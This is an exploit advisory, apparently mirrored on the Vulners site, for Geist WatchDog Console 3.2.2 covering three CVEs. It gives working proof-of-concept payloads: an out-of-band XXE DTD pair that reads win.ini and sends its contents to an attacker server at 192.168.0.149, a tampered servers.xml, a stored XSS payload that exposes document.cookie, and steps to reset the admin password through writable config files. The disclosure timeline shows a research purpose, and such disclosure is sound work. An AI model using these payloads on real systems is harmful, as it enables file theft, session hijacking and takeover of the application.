Vulners
Lucene search
Geist WatchDog Console 3.2.2 XSS / XML Injection / Insecure Permissions
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities | 18 Apr 201800:00 | – | zdt |
 | Geist WatchDog Console Cross-Site Scripting Vulnerability | 24 Apr 201800:00 | – | cnvd |
| Geist WatchDog Console Insecure File Permission Vulnerability | 24 Apr 201800:00 | – | cnvd |
| Geist WatchDog Console XML External Entity Injection Vulnerability | 24 Apr 201800:00 | – | cnvd |
 | CVE-2018-10077 | 20 Apr 201821:00 | – | cve |
| CVE-2018-10078 | 20 Apr 201821:00 | – | cve |
| CVE-2018-10079 | 20 Apr 201821:00 | – | cve |
 | CVE-2018-10077 | 20 Apr 201821:00 | – | cvelist |
| CVE-2018-10078 | 20 Apr 201821:00 | – | cvelist |
| CVE-2018-10079 | 20 Apr 201821:00 | – | cvelist |
10
`# Exploit Author: bzyo
# CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079
# Twitter: @bzyo_
# Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
# Date: 04-17-18
# Vulnerable Software: WatchDog Console - 3.2.2
# Vendor Homepage: http://www.itwatchdogs.com/
# Version: 3.2.2
# Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe
# Tested On: Windows 7 x86
Description
-----------------------------------------------------------------
WatchDog Console suffers from multiple vulnerabilities:
# CVE-2018-10077 Authenticated XML External Entity (XXE)
# CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS)
# CVE-2018-10079 Insecure File Permissions
Prerequisites
-----------------------------------------------------------------
To successfully exploit these vulnerabilities, an attacker must already have access
to a system running WatchDog Console using a low-privileged user account
Proof of Concepts
-----------------------------------------------------------------
### CVE-2018-10079 Insecure File Permissions ###
By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and
gives 'Authenticated Users' group Modify permissions
C:\>icacls "c:\ProgramData\WatchDog Console"
c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC)
This allows any local user of the system the ability to reset the application admin password by generating
a password using the PHP md5() function and updating the config.xml file. It also provides the ability to
add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface
### CVE-2018-10077 Authenticated XML External Entity (XXE) ###
With authenticated admin access to the application or local access to the system, a user has the ability to read
system files remotely through XXE
On attacking machine
- Create data.xml with following contents in apache root and start apache listening on 80
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://192.168.0.149:8080/evil.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
- Create evil.xml with the following contents anywhere
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://192.168.0.149:8080/?%data;'>">
- Start python simple http server in same directory as evil.xml, listening on 8080
python -m SimpleHTTPServer 8080
On victim machine (1 of 2 ways)
1. With admin access to application console, add attacking server IP address under servers tab
or
2. With local access to system
- update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<servers>
<server host="192.168.0.149" addrType="http" port="80" description="" selEmail="True" Username="1" Password="1" left="700" top="420" />
</servers>
- restart system
On attacking machine
- Contents of 'win.ini' is outputted to console
- evil.xml can be updated to read other sensitive files (tested reading file from admin desktop)
### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ###
This application suffers from authenticated XSS on several inputs (1 of 2 ways)
1. With admin access to application console, under servers tab
- add dummy IP in server name filed
- add <script>alert(document.cookie)</script>"> into server description
or
2. With local access to system
- update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<servers>
<server host="172.16.1.1" addrType="http" port="80" description="<script>alert(document.cookie)</script>">" selEmail="True" Username="1" Password="1" left="400" top="180" />
</servers>
- restart system
3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot.
Timeline
---------------------------------------------------------------------
04-14-18: Vendor notified of vulnerabilities
04-16-18: Vendor responded "Thank you for bringing this to our attention. The product has now been End-of-life for
several years and is no longer receiving updates."
04-17-18: Submitted public disclosure
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Apr 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.14111